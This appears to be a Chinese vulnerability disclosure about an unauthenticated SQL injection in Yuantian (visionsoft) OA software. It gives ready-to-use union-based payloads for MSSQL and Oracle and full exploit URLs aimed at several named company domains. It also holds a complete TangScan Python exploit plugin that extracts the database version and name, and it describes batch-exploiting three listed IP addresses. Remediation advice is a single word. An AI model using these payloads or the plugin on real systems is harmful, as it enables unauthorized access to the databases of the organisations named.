1)通用型SQL注入漏洞廠商:源天軟件
網(wǎng)址:http://www.visionsoft.com.cn/
漏洞鏈接:ServiceAction/com.velcro.base.DataAction
說明:該oa系統(tǒng)使用mssql和oracle兩個類型的數(shù)據(jù)庫,
某OA通用型SQL注入漏洞
。案例分別給出兩種類型的利用poc。利用POC:
MsSql數(shù)據(jù)庫:
ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true
Oracle數(shù)據(jù)庫:
ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true
(直接訪問即可):
MsSql部分
A)http://km.best-team.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
B)http://bms.9square.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
C)http://oa.jsfuan.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20@@version&isworkflow=true
Oracle部分
D)http://winshare.com.cn/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select (select banner from sys.v_$version where rownum=1) from dual&isworkflow=true
E)http://oa.mcds.com/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id=%27%27%20and%201=2%20union%20all%20select%20(select%20banner%20from%20sys.v_$version%20where%20rownum=1)%20from%20dual&isworkflow=true
2)說好的為了支持 TangScan 而來直接給出編寫好的插件代碼(本人代碼盲,瞎寫的,大牛勿噴),等公布時,該插件已經(jīng)入庫 TangScan.com 。
#! /usr/bin/env python# -*- coding: utf-8 -*-"""Copyright (c) 2013-2014 TangScan developers (http://www.wooyun.org/)See the file 'docs/COPYING' for copying permissionauthor: fate0"""import refrom thirdparty import requestsfrom modules.exploit import TSExploit__all__ = ['TangScan']class TangScan(TSExploit): def __init__(self): super(self.__class__, self).__init__() self.info = { "name": "源天軟件OA辦公系統(tǒng) sql 注入MSSQL版漏洞(無需登錄)", "product": "源天", "product_version": "", "desc": """ OA辦公系統(tǒng) /ServiceAction/com.velcro.base.DataAction 中的 sql 參數(shù)存在注入, 將導(dǎo)致敏感數(shù)據(jù)泄漏 """, "license": self.license.TS, "author": ["Coody"], "ref": [ {self.ref.wooyun: "暫無"}, ], "type": self.type.injection, "severity": self.severity.high, "privileged": False, "disclosure_date": "2015-07-22", "create_date": "2015-07-23", } self.register_option({ "url": { "default": "", "required": True, "choices": [], "convert": self.convert.url_field, "desc": "目標 url" } }) self.register_result({ "status": False, "data": { "db_info": { "version": "", "current_db": "" } }, "description": "", "error": "" }) def verify(self): self.print_debug("verify start") re_version_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE) exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select @@version&isworkflow=true".format(domain=self.option.url)) try: response = requests.get(exp_url, timeout=15, verify=False) except Exception, e: self.result.error = str(e) return re_result = re_version_pattern.findall(response.content) if len(re_result) == 0: self.result.status = False return self.result.status = True self.result.data.db_info.version = re_result[0] self.result.description = "目標 {url} 存在sql注入, 目標使用數(shù)據(jù)庫版本為: {db_version}".format( url=self.option.url, db_version=re_result[0] ) def exploit(self): self.print_debug("exploit start") re_userinfo_pattern = re.compile(r'(.+?)', re.IGNORECASE | re.DOTALL | re.MULTILINE) exp_url = ("{domain}/ServiceAction/com.velcro.base.DataAction?sql=|20select|20categoryids|20from|20project|20where|20id='' and 1=2 union all select db_name()&isworkflow=true".format(domain=self.option.url)) try: response = requests.get(exp_url, timeout=15, verify=False) except Exception, e: self.result.error = str(e) return re_result = re_userinfo_pattern.findall(response.content) if len(re_result) == 0: self.result.status = False return self.result.status = True self.result.data.db_info.current_db = re_result[0] self.result.description = "目標 {url} 存在sql注入, 數(shù)據(jù)庫名稱為: {current_db}".format( url=self.option.url, current_db=self.result.data.db_info.current_db )if __name__ == '__main__': from modules.main import main main(TangScan())看下執(zhí)行插件后的結(jié)果:
執(zhí)行 --mode verify (默認)
執(zhí)行 --mode exploit
插件運行正常,能夠順利輸出數(shù)據(jù),
電腦資料
《某OA通用型SQL注入漏洞》(http://www.szmdbiao.com)。。。。。。到這里本來應(yīng)該結(jié)束了
但是我手賤
給出批量檢測網(wǎng)站的腳本測試結(jié)果
測試的網(wǎng)站分別是:
http://60.12.113.234:8080/
http://121.14.195.31:8081/
http://218.246.22.194:8080/
測試中,直接執(zhí)行 --mode exploit ,批量獲取數(shù)據(jù)庫名稱吧。
測試完畢,看下結(jié)果文件 success.txt 內(nèi)容
嗯、到這里該結(jié)束了···
解決方案:
過濾